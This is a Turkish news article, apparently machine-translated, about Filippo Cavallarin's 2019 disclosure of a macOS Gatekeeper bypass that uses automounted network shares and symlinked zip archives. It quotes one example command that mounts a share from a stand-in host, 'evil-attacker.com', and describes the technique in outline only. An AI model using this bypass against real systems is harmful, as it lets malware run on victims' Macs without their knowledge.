Kötü amaçlı bir uygulamayı Mac'e yüklemek kolaydır. Apple üç ay geçmesine rağmen hatayı düzeltmedi

27. 5. 2019

Güvenlik araştırmacısı Filippo Cavallarin, blogunda macOS 10.14.5'teki hatayla ilgili bir uyarı yayınladı. Bu, Gatekeeper'ın güvenlik önlemlerinin tamamen aşılması olasılığını içerir. Cavallarin'e göre bu yılın şubat ayında Apple'a hatayı bildirmişti ancak şirket son güncellemede sorunu düzeltmemişti.

Gatekeeper, Apple tarafından geliştirilip ilk kez 2012 yılında masaüstü işletim sistemine dahil edilmiştir. Bir uygulamanın kullanıcının bilgisi ve izni olmadan çalışmasını engelleyen bir mekanizmadır. Bir uygulamayı indirdikten sonra Gatekeeper, yazılımın Apple tarafından düzgün şekilde imzalanıp imzalanmadığını görmek için otomatik olarak uygulamanın kodunu kontrol eder.

Cavallarin, blog yazısında Gatekeeper'ın varsayılan olarak hem harici depolamayı hem de ağ paylaşımlarını güvenli konumlar olarak değerlendirdiğini belirtiyor. Dolayısıyla bu hedeflerde bulunan herhangi bir uygulama, Gatekeeper kontrolünden geçmek zorunda kalmadan otomatik olarak başlatılabilir. Kullanıcının bilgisi olmadan kötü amaçlı yazılım başlatmak için kullanılabilen bu özelliktir.

Yetkisiz erişime izin veren yönlerden biri, kullanıcıların yalnızca "/net/" ile başlayan bir yol belirterek bir ağ paylaşımını otomatik olarak bağlamasına olanak tanıyan otomatik bağlama özelliğidir. Örnek olarak Cavallarin, işletim sisteminin potansiyel olarak kötü amaçlı olabilecek bir "paylaşım klasörü" klasörünün içeriğini uzak bir konuma yüklemesine neden olabilecek "ls /net/evil-attacker.com/sharedfolder/" yolunu gösteriyor.

Videoda tehdidin çalışma şeklini izleyebilirsiniz:

Diğer bir faktör ise, automount işlevine giden belirli bir sembolik bağlantı içeren bir zip arşivinin paylaşılması durumunda Gatekeeper tarafından kontrol edilmemesidir. Bu şekilde kurban, kötü amaçlı arşivi kolayca indirip sıkıştırabilir ve saldırganın, kullanıcının bilgisi olmadan Mac'teki hemen hemen her türlü yazılımı çalıştırmasına olanak tanır. Varsayılan olarak belirli uzantıları gizleyen Finder da bu güvenlik açığından nasibini alıyor.

Cavallarin, blogunda Apple'ın bu yıl 22 Şubat'ta macOS işletim sistemindeki güvenlik açığına dikkat çektiğini belirtiyor. Ancak mayıs ortasında Apple, Cavallarin ile iletişimi kesti ve Cavallarin her şeyi kamuoyuna açıklamaya karar verdi.

kaynak: FCVL

Konular: depolamak, otomatik, MacOS, video, Ayarlar, işlev, uzivatel, aplikace, Apple

Makalenin tartışılması

Adın

Senin yorumun

Yukarıdaki verileri doldurarak, kayıtlı ofisi Brno, Durďákova 336/29, Černá Pole, posta kodu: 613 00, kimlik numarası: 06157831 olan TEXT FACTORY s.r.o. şirketinin Brno Bölge Mahkemesinde, bölüm C'de kayıtlı olduğunu kabul ediyorum. , 100399 ekleyin, doldurduğum kayıt formunda sağlanan kişisel verilerimi, TEXT FACTORY s.r.o.'nun meşru menfaatleri temelinde, Madde 6 paragraf 1 mektubu uyarınca işleyecektir. f) GDPR ve aşağıdaki amaçlarla yasal yükümlülükleri yerine getirmek (Madde 6, paragraf 1, bent c) GDPR): TEXT FACTORY s.r.o. tarafından işletilen web sitelerine gelen ziyaretçilerin, yayınlanan makalelere veya tartışmalara aktif olarak katkıda bulunmaları için yetkilendirilmesinin sağlanması gerekliliği forumları kullanma ve bu tartışma forumlarının yöneticisi olarak TEXT FACTORY s.r.o.'nun haklarını kullanma. Kişisel verilerin ve hakların işlenmesine ilişkin daha fazla bilgiyi şurada bulabilirsiniz: Kişisel verilerin korunmasına ilişkin dersler. metnin tamamı

Olabilir seninle ilgilenmek

İlgili